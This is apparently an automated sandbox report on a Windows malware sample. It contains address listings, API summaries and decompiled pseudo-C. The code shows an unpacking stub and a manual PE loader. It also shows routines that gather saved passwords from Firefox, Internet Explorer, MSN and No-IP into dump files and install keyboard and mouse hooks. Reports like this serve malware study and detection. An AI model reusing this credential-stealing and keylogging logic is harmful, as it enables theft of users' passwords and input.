                                    0x00401a07
                                    0x00401a0e
                                    0x00401a10
                                    0x00401a10
                                    0x00000000
                                    0x00401a16
                                    0x00401a1a
                                    0x00401a23
                                    0x00401a23
                                    0x00401a26
                                    0x00401a30
                                    0x00401a3c
                                    0x00401a3e
                                    0x00401a44
                                    0x00401a47
                                    0x00401a47
                                    0x00401a4a
                                    0x00401a4d
                                    0x00401a54
                                    0x00401a54
                                    0x00401a4d
                                    0x00401a3c
                                    0x00401a59
                                    0x00401a63
                                    0x00401a65
                                    0x00401a65
                                    0x00401a6c
                                    0x00401a6e
                                    0x00401a6e
                                    0x00401a76
                                    0x00401a7f
                                    0x00401a81
                                    0x00401a81
                                    0x00401a8a
                                    0x00401a8a
                                    0x00401a9b
                                    0x00401a9b
                                    0x00401a9d
                                    0x00401a9d
                                    0x004019f6
                                    0x004019f6
                                    0x004019fc
                                    0x00401a00
                                    0x00401a02
                                    0x00000000
                                    0x004019f6

                                    APIs
                                    • FreeLibrary.KERNEL32(00400000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A54
                                    • ExitProcess.KERNEL32(00000000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExitFreeLibraryProcess
                                    • String ID: @&@$@&@$D0@
                                    • API String ID: 1404682716-1618351410
                                    • Opcode ID: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction ID: 5263b8d098c20f51001af61e3d55436e18b8afc55997b24df4f1e0aa037ee43b
                                    • Opcode Fuzzy Hash: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction Fuzzy Hash: 4521AF70A022418FEB209FA5C9887537BE5AF44318F284476D848AA2E2C77CCCC5CF5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00455C10, Relevance: 7.7, APIs: 5, Instructions: 179librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			_entry_(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v128;
				void* _t64;
				void* _t65;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				signed int _t70;
				signed int _t71;
				unsigned int _t72;
				char _t82;
				signed char* _t84;
				long _t85;
				char* _t88;
				void* _t92;
				long _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t108;
				void* _t111;
				long _t112;
				char* _t123;
				intOrPtr* _t136;
				long _t140;
				intOrPtr* _t143;
				long _t147;
				intOrPtr* _t150;
				long _t154;
				struct HINSTANCE__* _t157;
				struct HINSTANCE__* _t160;
				signed int _t163;
				signed int _t255;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				char* _t271;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t282;
				void* _t283;
				intOrPtr* _t285;
				intOrPtr _t291;
				signed int _t316;
				unsigned int* _t317;
				CHAR* _t319;
				void* _t320;
				char* _t321;
				signed int _t322;
				unsigned int* _t323;
				signed int _t324;
				struct HINSTANCE__* _t325;
				unsigned int _t326;
				intOrPtr _t327;
				DWORD* _t328;
				intOrPtr _t329;
				void* _t330;
				signed int _t332;
				void* _t335;

				_t335 = __fp0;
				_t330 = __eflags;
				asm("pushad");
				_t322 = 0x412000;
				_t1 = _t322 - 0x11000; // 0x401000
				_t316 = _t1;
				_push(_t316);
				_t325 = _t324 | 0xffffffff;
				while(1) {
					_t259 =  *_t322;
					_t322 = _t322 - 0xfffffffc;
					asm("adc ebx, ebx");
					do {
						if(_t330 < 0) {
							_t64 =  *_t322;
							_t322 = _t322 + 1;
							 *_t316 = _t64;
							_t316 = _t316 + 1;
							__eflags = _t316;
							goto L47;
						}
						_t65 = 1;
						while(1) {
							_t260 = _t259 + _t259;
							if(_t260 == 0) {
								_t260 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t261 = _t260 + _t260;
							_t332 = _t261;
							if(_t332 >= 0) {
								goto L56;
							}
							L54:
							if(_t332 != 0) {
								L62:
								_t272 = 0;
								_t66 = _t65 - 3;
								__eflags = _t66;
								if(_t66 < 0) {
									_t261 = _t261 + _t261;
									__eflags = _t261;
									if(__eflags == 0) {
										_t261 =  *_t322;
										_t322 = _t322 - 0xfffffffc;
										asm("adc ebx, ebx");
									}
									L67:
									if(__eflags < 0) {
										L59:
										_t259 = _t261 + _t261;
										__eflags = _t259;
										if(_t259 == 0) {
											_t259 =  *_t322;
											_t322 = _t322 - 0xfffffffc;
											asm("adc ebx, ebx");
										}
										asm("adc ecx, ecx");
										L77:
										__eflags = _t325 - 0xfffffb00;
										asm("adc ecx, 0x2");
										_t285 = _t325 + _t316;
										__eflags = _t325 - 0xfffffffc;
										if(_t325 <= 0xfffffffc) {
											do {
												_t67 =  *_t285;
												_t285 = _t285 + 4;
												 *_t316 = _t67;
												_t316 = _t316 + 4;
												_t272 = _t272 - 4;
												__eflags = _t272;
											} while (_t272 > 0);
											_t316 = _t316 + _t272;
											break;
										} else {
											goto L78;
										}
										do {
											L78:
											_t68 =  *_t285;
											_t285 = _t285 + 1;
											 *_t316 = _t68;
											_t316 = _t316 + 1;
											_t272 = _t272 - 1;
											__eflags = _t272;
										} while (_t272 != 0);
										break;
									}
									_t272 = _t272 + 1;
									_t261 = _t261 + _t261;
									__eflags = _t261;
									if(__eflags == 0) {
										_t261 =  *_t322;
										_t322 = _t322 - 0xfffffffc;
										asm("adc ebx, ebx");
									}
									if(__eflags < 0) {
										goto L59;
									} else {
										goto L71;
										do {
											do {
												L71:
												_t262 = _t261 + _t261;
												__eflags = _t262;
												if(_t262 == 0) {
													_t262 =  *_t322;
													_t322 = _t322 - 0xfffffffc;
													asm("adc ebx, ebx");
												}
												asm("adc ecx, ecx");
												_t261 = _t262 + _t262;
												__eflags = _t261;
											} while (__eflags >= 0);
											if(__eflags != 0) {
												break;
											}
											_t261 =  *_t322;
											_t322 = _t322 - 0xfffffffc;
											__eflags = _t322;
											asm("adc ebx, ebx");
										} while (_t322 >= 0);
										_t272 = _t272 + 2;
										__eflags = _t272;
										goto L77;
									}
								}
								_t70 =  *_t322;
								_t322 = _t322 + 1;
								_t71 = _t70 ^ 0xffffffff;
								__eflags = _t71;
								if(__eflags == 0) {
									_pop(_t323);
									_t317 = _t323;
									goto L83;
									do {
										do {
											L83:
											_t72 =  *_t317;
											_t317 =  &(_t317[0]);
											__eflags = _t72 - 0xe8 - 1;
										} while (_t72 - 0xe8 > 1);
										__eflags =  *_t317 - 1;
									} while ( *_t317 != 1);
									asm("rol eax, 0x10");
									 *_t317 = ( *_t317 >> 8) - _t317 + _t323;
									__eflags =  &(_t317[1]);
									asm("loop 0xffffffdb");
									_t50 =  &(_t323[0x13c00]); // 0x450000
									_t319 = _t50;
									while(1) {
										L86:
										_t82 =  *_t319;
										__eflags = _t82;
										if(_t82 == 0) {
											break;
										}
										_t51 =  &(_t319[4]); // 0xf1ec
										_t271 = _t323 +  *_t51;
										_t321 =  &(_t319[8]);
										__eflags = _t321;
										_t325 = LoadLibraryA( &(_t323[0x156c2]) + _t82);
										while(1) {
											_t319 =  &(_t321[1]);
											_t255 =  *_t321;
											__eflags = _t255;
											if(_t255 == 0) {
												goto L86;
											}
											asm("repne scasb");
											_t82 = GetProcAddress(_t325, _t319);
											__eflags = _t82;
											if(_t82 == 0) {
												ExitProcess();
											}
											 *_t271 = _t82;
											_t271 =  &(_t271[4]);
										}
									}
									_t326 = _t323[0x156f6];
									_t59 = _t323 - 0x1000; // 0x400000
									_t320 = _t59;
									VirtualProtect(_t320, 0x1000, 4, _t328);
									_t60 = _t320 + 0x21f; // 0x40021f
									_t84 = _t60;
									 *_t84 =  *_t84 & 0x0000007f;
									_t61 =  &(_t84[0x28]);
									 *_t61 = _t84[0x28] & 0x0000007f;
									__eflags =  *_t61;
									_t85 = _t82;
									_push(_t85);
									VirtualProtect(_t320, 0x1000, _t85, _t328); // executed
									asm("popad");
									_t88 =  &_v128;
									do {
										_push(0);
										__eflags = _t328 - _t88;
									} while (_t328 != _t88);
									_t329 = _t328 - 0xffffff80;
									_push(_t326);
									_t327 = _t329;
									_t274 = 0xb;
									do {
										_push(0);
										_push(0);
										_t274 = _t274 - 1;
										__eflags = _t274;
									} while (_t274 != 0);
									_push(0x1000);
									E00403418(0x40bb04);
									_push(_t327);
									_push(0x40c0c4);
									_push( *[fs:eax]);
									 *[fs:eax] = _t329;
									_t92 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
									_t266 = _t92;
									_t93 = GetLastError();
									__eflags = _t93 - 0xb7;
									if(_t93 != 0xb7) {
										CloseHandle(_t266); // executed
									} else {
										CloseHandle(_t266);
										Sleep(0x2ee0);
									}
									_t95 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
									_t267 = _t95;
									__eflags = GetLastError() - 0xb7;
									if(__eflags != 0) {
										CloseHandle(_t267);
										_t98 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
										_t268 = _t98;
										__eflags = GetLastError() - 0xb7;
										if(__eflags != 0) {
											CloseHandle(_t268);
											L27:
											E004013A4(1,  &_v80);
											_t287 = "Restart";
											E00401E94(_v80, "Restart");
											if(__eflags != 0) {
												Sleep(0x3e8); // executed
											}
											E00404604(_t274, __eflags);
											E0040491C();
											E0040B118(_t287, _t320, _t323);
											_t108 =  *0x40d204; // 0x40e8f8
											_t111 = E00403568(0, 0, E00401F48( *_t108)); // executed
											_t269 = _t111;
											_t112 = GetLastError();
											__eflags = _t112 - 0xb7;
											if(_t112 != 0xb7) {
												CloseHandle(_t269); // executed
											} else {
												CloseHandle(_t269);
												Sleep(0x3e8);
												_t136 =  *0x40d204; // 0x40e8f8
												_t269 = E00403568(0, 0, E00401F48( *_t136));
												_t140 = GetLastError();
												__eflags = _t140 - 0xb7;
												if(_t140 != 0xb7) {
													CloseHandle(_t269);
												} else {
													CloseHandle(_t269);
													Sleep(0x3e8);
													_t143 =  *0x40d204; // 0x40e8f8
													_t269 = E00403568(0, 0, E00401F48( *_t143));
													_t147 = GetLastError();
													__eflags = _t147 - 0xb7;
													if(_t147 != 0xb7) {
														CloseHandle(_t269);
													} else {
														CloseHandle(_t269);
														Sleep(0x3e8);
														_t150 =  *0x40d204; // 0x40e8f8
														_t269 = E00403568(0, 0, E00401F48( *_t150));
														_t154 = GetLastError();
														__eflags = _t154 - 0xb7;
														if(_t154 != 0xb7) {
															CloseHandle(_t269);
														} else {
															ExitProcess(0);
														}
													}
												}
											}
											__eflags =  *((char*)( *0x40d1dc)) - 1;
											if( *((char*)( *0x40d1dc)) != 1) {
												__eflags = 0;
												E004013A4(0, 0x40f1e8);
											} else {
												E004013A4(0,  &_v88);
												E00406B54(_v88, _t269,  &_v84, _t320, _t323); // executed
												E00401B14(0x40f1e8, _v84);
											}
											E00406008( &_v92);
											E00401D58( &_v92, "XX--XX--XX.txt");
											E0040B93C( *0x40f1e8, _t269, _v92, _t320, _t323, __eflags);
											_t123 =  *0x40d214; // 0x40e8f4
											__eflags =  *_t123 - 1;
											if(__eflags == 0) {
												E0040B7FC(_t269, _t320, _t323, __eflags);
												Sleep(0x3e8); // executed
											}
											E0040B3C0(_t269, _t274, _t320, _t323); // executed
											L44:
											__eflags = 0;
											_pop(_t291);
											 *[fs:eax] = _t291;
											_push(0x40c0cb);
											return E00401AE4( &_v92, 0x12);
										}
										CloseHandle(_t268);
										_t157 =  *0x40e670; // 0x400000
										SetWindowsHookExA(0xd, E0040B0B8, _t157, 0);
										_t160 =  *0x40e670; // 0x400000
										SetWindowsHookExA(0xe, E0040B108, _t160, 0);
										while(1) {
											_t163 = E0040BA84(__eflags);
											__eflags = _t163;
											if(_t163 != 0) {
												break;
											}
											E00405918();
										}
										ExitProcess(0);
										goto L27;
									}
									CloseHandle(_t267);
									E00409AD4( &_v24, _t267, _t323, __eflags);
									E00401B14(0x40f1ec, _v24);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v28);
										E00401D58( &_v28, "NOIP.abc");
										_pop(_t283);
										E00405D70(_v28, _t267, _t283,  *0x40f1ec, _t323, __eflags);
									}
									E00409D28( &_v32, _t267, _t320, _t323);
									_t297 = _v32;
									E00401B14(0x40f1ec, _v32);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v36);
										E00401D58( &_v36, "MSN.abc");
										_t297 =  *0x40f1ec;
										_pop(_t282);
										E00405D70(_v36, _t267, _t282,  *0x40f1ec, _t323, __eflags);
									}
									E00409EF8( &_v40, _t267, _t297, _t320, _t323);
									E00401B14(0x40f1ec, _v40);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v44);
										E00401D58( &_v44, "FIREFOX.abc");
										_pop(_t281);
										E00405D70(_v44, _t267, _t281,  *0x40f1ec, _t323, __eflags);
									}
									E00409A84( &_v48);
									E00401B14(0x40f1ec, _v48);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v52);
										E00401D58( &_v52, "IELOGIN.abc");
										_pop(_t280);
										E00405D70(_v52, _t267, _t280,  *0x40f1ec, _t323, __eflags);
									}
									E00409A90( &_v56);
									E00401B14(0x40f1ec, _v56);
									__eflags =  *0x40f1ec;
									if(__eflags != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v60);
										E00401D58( &_v60, "IEPASS.abc");
										_pop(_t279);
										E00405D70(_v60, _t267, _t279,  *0x40f1ec, _t323, __eflags);
									}
									E00409A9C( &_v64, _t320, _t323, __eflags, _t335);
									E00401B14(0x40f1ec, _v64);
									__eflags =  *0x40f1ec;
									if(__eflags != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v68);
										E00401D58( &_v68, "IEAUTO.abc");
										_pop(_t278);
										E00405D70(_v68, _t267, _t278,  *0x40f1ec, _t323, __eflags);
									}
									E00409AB8( &_v72, _t320, _t323, __eflags);
									E00401B14(0x40f1ec, _v72);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v76);
										E00401D58( &_v76, "IEWEB.abc");
										_pop(_t277);
										E00405D70(_v76, _t267, _t277,  *0x40f1ec, _t323, __eflags);
									}
									goto L44;
								}
								_t325 = _t71 >> 1;
								goto L67;
							}
							_t261 =  *_t322;
							_t322 = _t322 - 0xfffffffc;
							asm("adc ebx, ebx");
							if(_t322 < 0) {
								goto L62;
							}
							L56:
							_t65 = _t65 - 1;
							_t259 = _t261 + _t261;
							if(_t259 == 0) {
								_t259 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t260 = _t259 + _t259;
							if(_t260 == 0) {
								_t260 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t261 = _t260 + _t260;
							_t332 = _t261;
							if(_t332 >= 0) {
								goto L56;
							}
						}
						L47:
						_t259 = _t259 + _t259;
						__eflags = _t259;
					} while (_t259 != 0);
				}
			}
























































































                                    0x00455c10
                                    0x00455c10
                                    0x00455c10
                                    0x00455c11
                                    0x00455c16
                                    0x00455c16
                                    0x00455c1c
                                    0x00455c1d
                                    0x00455c32
                                    0x00455c32
                                    0x00455c34
                                    0x00455c37
                                    0x00455c39
                                    0x00455c39
                                    0x00455c28
                                    0x00455c2a
                                    0x00455c2b
                                    0x00455c2d
                                    0x00455c2d
                                    0x00000000
                                    0x00455c2d
                                    0x00455c3b
                                    0x00455c40
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c51
                                    0x00455c51
                                    0x00455c7b
                                    0x00455c7b
                                    0x00455c7d
                                    0x00455c7d
                                    0x00455c80
                                    0x00455c93
                                    0x00455c93
                                    0x00455c95
                                    0x00455c97
                                    0x00455c99
                                    0x00455c9c
                                    0x00455c9c
                                    0x00455c9e
                                    0x00455c9e
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6e
                                    0x00455c70
                                    0x00455c72
                                    0x00455c75
                                    0x00455c75
                                    0x00455c77
                                    0x00455ccd
                                    0x00455ccd
                                    0x00455cd3
                                    0x00455cd6
                                    0x00455cd9
                                    0x00455cdc
                                    0x00455cec
                                    0x00455cec
                                    0x00455cee
                                    0x00455cf1
                                    0x00455cf3
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cfb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00455cde
                                    0x00455cde
                                    0x00455cde
                                    0x00455ce0
                                    0x00455ce1
                                    0x00455ce3
                                    0x00455ce4
                                    0x00455ce4
                                    0x00455ce4
                                    0x00000000
                                    0x00455ce7
                                    0x00455ca0
                                    0x00455ca1
                                    0x00455ca1
                                    0x00455ca3
                                    0x00455ca5
                                    0x00455ca7
                                    0x00455caa
                                    0x00455caa
                                    0x00455cac
                                    0x00000000
                                    0x00455cae
                                    0x00000000
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cb0
                                    0x00455cb2
                                    0x00455cb4
                                    0x00455cb7
                                    0x00455cb7
                                    0x00455cb9
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbf
                                    0x00000000
                                    0x00000000
                                    0x00455cc1
                                    0x00455cc3
                                    0x00455cc3
                                    0x00455cc6
                                    0x00455cc6
                                    0x00455cca
                                    0x00455cca
                                    0x00000000
                                    0x00455cca
                                    0x00455cac
                                    0x00455c85
                                    0x00455c87
                                    0x00455c88
                                    0x00455c88
                                    0x00455c8b
                                    0x00455d02
                                    0x00455d03
                                    0x00455d05
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0c
                                    0x00455d0f
                                    0x00455d0f
                                    0x00455d13
                                    0x00455d13
                                    0x00455d21
                                    0x00455d2d
                                    0x00455d2f
                                    0x00455d34
                                    0x00455d36
                                    0x00455d36
                                    0x00455d3c
                                    0x00455d3c
                                    0x00455d3e
                                    0x00455d3e
                                    0x00455d40
                                    0x00000000
                                    0x00000000
                                    0x00455d42
                                    0x00455d4c
                                    0x00455d4f
                                    0x00455d4f
                                    0x00455d58
                                    0x00455d59
                                    0x00455d5b
                                    0x00455d5c
                                    0x00455d5c
                                    0x00455d5e
                                    0x00000000
                                    0x00000000
                                    0x00455d64
                                    0x00455d6d
                                    0x00455d6d
                                    0x00455d6f
                                    0x00455d78
                                    0x00455d78
                                    0x00455d71
                                    0x00455d73
                                    0x00455d73
                                    0x00455d59
                                    0x00455d7e
                                    0x00455d84
                                    0x00455d84
                                    0x00455d95
                                    0x00455d97
                                    0x00455d97
                                    0x00455d9d
                                    0x00455da0
                                    0x00455da0
                                    0x00455da0
                                    0x00455da4
                                    0x00455da5
                                    0x00455daa
                                    0x00455dad
                                    0x00455dae
                                    0x00455db2
                                    0x00455db2
                                    0x00455db4
                                    0x00455db4
                                    0x00455db8
                                    0x0040bbf4
                                    0x0040bbf5
                                    0x0040bbf7
                                    0x0040bbfc
                                    0x0040bbfc
                                    0x0040bbfe
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc03
                                    0x0040bc09
                                    0x0040bc10
                                    0x0040bc11
                                    0x0040bc16
                                    0x0040bc19
                                    0x0040bc25
                                    0x0040bc2a
                                    0x0040bc2c
                                    0x0040bc31
                                    0x0040bc36
                                    0x0040bc4b
                                    0x0040bc38
                                    0x0040bc39
                                    0x0040bc43
                                    0x0040bc43
                                    0x0040bc59
                                    0x0040bc5e
                                    0x0040bc65
                                    0x0040bc6a
                                    0x0040be9b
                                    0x0040bea9
                                    0x0040beae
                                    0x0040beb5
                                    0x0040beba
                                    0x0040bf06
                                    0x0040bf0b
                                    0x0040bf13
                                    0x0040bf1b
                                    0x0040bf20
                                    0x0040bf25
                                    0x0040bf2c
                                    0x0040bf2c
                                    0x0040bf31
                                    0x0040bf36
                                    0x0040bf3b
                                    0x0040bf40
                                    0x0040bf51
                                    0x0040bf56
                                    0x0040bf58
                                    0x0040bf5d
                                    0x0040bf62
                                    0x0040c02a
                                    0x0040bf68
                                    0x0040bf69
                                    0x0040bf73
                                    0x0040bf78
                                    0x0040bf8e
                                    0x0040bf90
                                    0x0040bf95
                                    0x0040bf9a
                                    0x0040c022
                                    0x0040bfa0
                                    0x0040bfa1
                                    0x0040bfab
                                    0x0040bfb0
                                    0x0040bfc6
                                    0x0040bfc8
                                    0x0040bfcd
                                    0x0040bfd2
                                    0x0040c01a
                                    0x0040bfd4
                                    0x0040bfd5
                                    0x0040bfdf
                                    0x0040bfe4
                                    0x0040bffa
                                    0x0040bffc
                                    0x0040c001
                                    0x0040c006
                                    0x0040c012
                                    0x0040c008
                                    0x0040c00a
                                    0x0040c00a
                                    0x0040c006
                                    0x0040bfd2
                                    0x0040bf9a
                                    0x0040c034
                                    0x0040c037
                                    0x0040c062
                                    0x0040c064
                                    0x0040c039
                                    0x0040c03e
                                    0x0040c049
                                    0x0040c056
                                    0x0040c056
                                    0x0040c06c
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000
                                    0x0040be60
                                    0x00455c8f
                                    0x00000000
                                    0x00455c8f
                                    0x00455c53
                                    0x00455c55
                                    0x00455c58
                                    0x00455c5a
                                    0x00000000
                                    0x00000000
                                    0x00455c5c
                                    0x00455c5c
                                    0x00455c5d
                                    0x00455c5f
                                    0x00455c61
                                    0x00455c63
                                    0x00455c66
                                    0x00455c66
                                    0x00455c68
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c4f
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c39

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 00455D52
                                    • GetProcAddress.KERNEL32(?,0044FFF9), ref: 00455D67
                                    • ExitProcess.KERNEL32(?,0044FFF9), ref: 00455D78
                                    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,7479411C), ref: 00455D95
                                    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 00455DAA
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction ID: 60ef33331dc92bd8925b533821660d0d47773761dcb7daf1aaa77766f171e575
                                    • Opcode Fuzzy Hash: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction Fuzzy Hash: 2E511A72951B124BD7214EB89CE46B577A4EB12336728073ACDE1C73C7E7A8580E8758
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403EC0, Relevance: 7.7, APIs: 5, Instructions: 177memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E00403EC0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				signed int _v52;
				long _v56;
				char _v60;
				void* _t116;
				void* _t121;
				void* _t135;
				intOrPtr _t138;
				void* _t150;
				void* _t175;
				signed int _t184;
				signed int _t185;
				intOrPtr _t189;
				intOrPtr _t197;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t209;
				signed int _t210;
				void* _t213;
				void* _t216;
				intOrPtr* _t217;

				_t208 = __edi;
				_t215 = _t216;
				_t217 = _t216 + 0xffffffc8;
				_push(__edi);
				_v44 = __ecx;
				_t183 = __edx;
				_v40 = __eax;
				_t197 =  *0x4037bc; // 0x4037c0
				E0040242C( &_v36, _t197);
				_push(_t216);
				_push(0x4040ba);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_push(0);
				_push(_v44);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) +  *_t217;
				_t116 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1); // executed
				_v16 = _t116;
				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
				_t121 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4); // executed
				_v48 = _t121;
				E00401258(_v44,  *(_v8 + 0x54), _v48);
				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56); // executed
				_t213 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
				_t135 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t135 >= 0) {
					_v60 = _t135 + 1;
					_t185 = 0;
					do {
						_t208 =  *(_t213 + 8 + (_t185 + _t185 * 4) * 8);
						_v52 =  *((intOrPtr*)(_t213 + 0x10 + (_t185 + _t185 * 4) * 8));
						if(_t208 < _v52) {
							_t210 = _t208 ^ _v52;
							_v52 = _v52 ^ _t210;
							_t208 = _t210 ^ _v52;
						}
